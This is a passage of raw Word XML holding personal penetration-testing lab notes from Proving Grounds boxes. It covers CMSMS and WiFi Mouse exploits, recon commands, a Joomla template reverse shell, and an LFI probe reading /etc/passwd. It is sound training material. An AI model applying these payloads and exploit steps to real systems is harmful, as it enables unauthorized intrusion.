      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">See if the password has been successfully changed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000383D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1422400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="381" name="image368.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image368.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1212"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="59436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383E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000383F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then from here, since we are authenticated, we can use the authenticated searchsploit exploits. This box was CMSMS Version 2.2.13, but the only available ones were for 2.2.14, so we tried that and it worked. The exploit is </w:t>
      </w:r>
      <w:hyperlink r:id="rId1213">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3840">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="237"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1214">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/48779</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003841">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003842">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_d6e6pfq3bhd3" w:id="523"/>
      <w:bookmarkEnd w:id="523"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"File does not exist" error message</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003843">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003844">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4365364" cy="2287619"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="558" name="image552.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image552.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1215"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4365364" cy="2287619"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003845">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1205"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you ever see a message like "File does not exist" or like "File doesn't exist", then that means the website might be parsing for a file. So you can try parameter fuzzing (or manually try ?file=../../../../../../etc/passwd) and get LFI.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003846">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003847">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4748213" cy="2229529"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="406" name="image397.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image397.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1216"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4748213" cy="2229529"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003848">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="864"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As you can see, it worked here</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003849">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000384A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000384B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ipzov1ywjaq0" w:id="524"/>
      <w:bookmarkEnd w:id="524"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Joomla</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000384C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000384D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Joomla is a CMS, and in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1217">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">GlasgowSmile</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, after we got past the login page via guessing username as "Joomla" and brute forcing using cewl, we learned to navigate to the Templates section and then Protostar section where we found the index.php page. Now, we can paste a php reverse shell, save it, and then try accessing the index.php page, which activates reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000384E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000384F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_whz1o5m6ecqo" w:id="525"/>
      <w:bookmarkEnd w:id="525"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ROT1 / ROT13</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003850">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In one of 3 Hard PG Play boxes, they used ROT1, which is the cypher used to rotate all letters by one letter. We just had to guess that this text was ROT1, since it looked like English but the words didn't make sense </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003851">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003852">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003853">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_6fj2q2yza9i" w:id="526"/>
      <w:bookmarkEnd w:id="526"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Editing hexadecimal shell code </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003854">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003855">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1218">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Internal</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice, they had a hexadecimal shellcode (it was supposed to give a reverse shell), but inside that shell code they have to edit the IP and port number of the payload to make sure the reverse shell connects to right port. So look at the write up for how to navigate that.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003856">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1088"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is </w:t>
      </w:r>
      <w:hyperlink r:id="rId1219">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">another</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> write up for that too</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003857">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_prmdy5vg8ren" w:id="527"/>
      <w:bookmarkEnd w:id="527"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WiFi Mouse (Mouse Server)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003858">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Also seen in </w:t>
      </w:r>
      <w:hyperlink r:id="rId1220">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Mice</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice where they tried a bunch and only this exploit worked:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1221">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/p0dalirius/RemoteMouse-3.008-Exploit</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000385A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000385B">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XXXXXXXXX-A .145</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000385C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000385D">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WiFi Mouse (Mouse Server)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1.7.8.5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000385E">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So, this was a wifi mouse exploit. There seemed to multiple ways to find that out</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000385F">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The first way was to do an UDP scan, see SNMP, and use SNMP to enumerate installed applications, and then you should see wifi mouse 1.7.8.5, which is vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003860">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26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sudo nmap -Pn -n 192.168.236.145 -sU --top-ports=100</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003861">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26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snmpwalk -c public -v1 192.168.236.145 1.3.6.1.2.1.25.6.3.1.2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003862">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="266"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">you should see</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> iso.3.6.1.2.1.25.6.3.1.2.12 = STRING: "Mouse Server version 1.7.8.5"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003863">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The second way was to see that port 1978 (TCP) was open. NMAP said it was unisql but it was unsure. If you look search up port 1978, the first results are wifi mouse exploits, since I think that's where wifi mouse lives.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003864">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="266"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003865">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Now, to exploit it, I tried multiple exploits. The first one that came up for Wifi Mouse 1.7.8.5 was Exploit-DB 49601, but this was version 1, and it didn't seem to work. At least I'm not sure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003866">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And then I tried version 2, which was ExploitDB 50972. This actually had a python error just like the last one, but I looked at Discord, and apparently it works when you download locally from searchsploit! It must be some formatting issues when you try curling it or downloading it from exploitdb.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003867">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26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searchsploit -m 50972</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003868">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="266"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This downloads the exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003869">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To run the command, look at the usage:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000386A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="266"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">USAGE: python 50972.py &lt;target-ip&gt; &lt;local-http-server-ip&gt; &lt;payload-name&gt;</w:t>
      </w:r>
    </w:p>
